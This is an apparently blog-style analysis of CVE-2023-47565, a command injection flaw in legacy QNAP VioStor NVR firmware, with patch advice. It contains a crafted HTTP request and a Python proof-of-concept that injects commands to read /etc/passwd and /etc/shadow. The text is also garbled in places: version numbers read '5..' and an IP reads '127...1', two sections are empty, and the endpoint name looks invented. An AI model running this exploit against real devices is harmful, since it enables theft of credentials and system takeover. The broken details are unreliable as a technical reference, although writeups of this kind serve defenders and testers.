CVE-2023-47565 - OS Command Injection Vulnerability in Old QNAP VioStor NVR (QVR Firmware 4.x) – Full Analysis & Exploit Example

QNAP is popular for their network video recorders (NVRs), especially for security camera setups. In late 2023, a dangerous vulnerability (CVE-2023-47565) was found in several legacy QNAP VioStor NVR models running QVR Firmware 4.x. This issue lets attackers who have legitimate login credentials run any system command through the network interface. If you or your company use affected QNAP devices, keep reading!

What Is CVE-2023-47565?

CVE-2023-47565 is an OS command injection in the older QVR Firmware 4.x. It allows an authenticated user—think regular user, not admin—to inject commands into certain API calls. Once inside, they can execute commands on the operating system. For attackers already inside your network, or if weak passwords are in play, this could mean trouble.

Affected Products:

QNAP VioStor NVR (models running QVR Firmware 4.x)

Fixed in:
- QVR Firmware 5.. and later (QNAP Security Bulletin)

How the Exploit Works

The root issue: Input fields in the QTS web interface didn't properly sanitize user input. This means certain API endpoints would pass whatever you send straight to the shell.

Example of the Vulnerable Endpoint

A common vector is the “test” or “diagnostic” system interface, often used for pinging or tracing network connectivity. Here’s the problem:

POST /cgi-bin/vulnerability.cgi HTTP/1.1
Host: <NVR-IP>
Session: <valid-session-cookie>
Content-Type: application/x-www-form-urlencoded

param=192.168.1.1;cat /etc/passwd

The param field above is supposed to accept an IP address. If you add a semicolon, you can chain another command—like cat /etc/passwd.

Pivot to other devices in local network

Note: You need an authenticated session, so this is especially bad if you use default, weak, or leaked credentials.

Exploit Proof of Concept (PoC)

> Warning: For testing on your own hardware *only*. Never attack systems you don’t own or have written permission to test.

Sample Exploit in Python

import requests

TARGET = 'http://<NVR-IP>';
USERNAME = 'user'
PASSWORD = 'password'

# First, log in to get a session cookie
login_data = {
    'user': USERNAME,
    'pwd': PASSWORD
}
s = requests.Session()
login = s.post(f"{TARGET}/cgi-bin/login.cgi", data=login_data)

# Next, exploit the vulnerable endpoint
# Let's read the shadow file
exploit_data = {
    'param': '127...1;cat /etc/shadow'  # OS command injection
}
response = s.post(f"{TARGET}/cgi-bin/vulnerability.cgi", data=exploit_data)

print(response.text)

Download & Install QVR Firmware 5..+

- QNAP’s Official Advisory & Update instructions

Change all default and weak passwords after updating.

If you can’t update:

References

- QNAP Security Bulletin: QSA-23-65
- NIST NVD: CVE-2023-47565
- QNAP forum Vulnerability Report (User Discussion)

Bottom Line

CVE-2023-47565 is very serious, but there’s a fix. If you use legacy QNAP VioStor NVRs, patch to QVR Firmware 5.. or newer right away. Limit who can log in, and never use default passwords. This is the best way to keep your surveillance and your network protected.

Timeline

Published on: 12/08/2023 16:15:16 UTC
Last modified on: 12/22/2023 02:00:01 UTC